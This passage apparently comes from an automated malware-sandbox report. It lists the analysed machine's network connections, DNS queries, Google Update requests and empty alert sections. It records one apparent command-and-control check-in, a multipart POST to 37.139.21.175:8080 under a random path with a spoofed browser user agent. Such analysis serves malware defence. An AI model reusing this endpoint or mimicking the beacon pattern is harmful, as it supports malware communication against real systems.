192.168.56.101 49195 113.108.239.196 r3---sn-j5o7dn7e.gvt1.com 80
192.168.56.101 49193 203.208.41.65 redirector.gvt1.com 80
192.168.56.101 49191 203.208.41.98 update.googleapis.com 443
192.168.56.101 49189 37.139.21.175 8080

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50568 114.114.114.114 53
192.168.56.101 53500 114.114.114.114 53
192.168.56.101 53657 114.114.114.114 53
192.168.56.101 54178 114.114.114.114 53
192.168.56.101 55368 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 56743 114.114.114.114 53
192.168.56.101 58070 114.114.114.114 53
192.168.56.101 63429 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 50002 224.0.0.252 5355
192.168.56.101 50534 224.0.0.252 5355
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 51963 224.0.0.252 5355
192.168.56.101 53210 224.0.0.252 5355
192.168.56.101 54991 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: redirector.gvt1.com
http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619957533&mv=m&mvi=1&pl=23&shardbypass=yes 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619957533&mv=m&mvi=1&pl=23&shardbypass=yes HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r1---sn-j5o7dn7e.gvt1.com
http://37.139.21.175:8080/aGH4/qnN2svK8/gHAHwXkwzomcA2thylh/ 
POST /aGH4/qnN2svK8/gHAHwXkwzomcA2thylh/ HTTP/1.1
Referer: http://37.139.21.175/aGH4/qnN2svK8/gHAHwXkwzomcA2thylh/
Content-Type: multipart/form-data; boundary=---------------------------335877802847121
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 37.139.21.175:8080
Content-Length: 4548
Connection: Keep-Alive
Cache-Control: no-cache
http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=8a2e83f203724371&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619957533&mv=m 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=8a2e83f203724371&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619957533&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.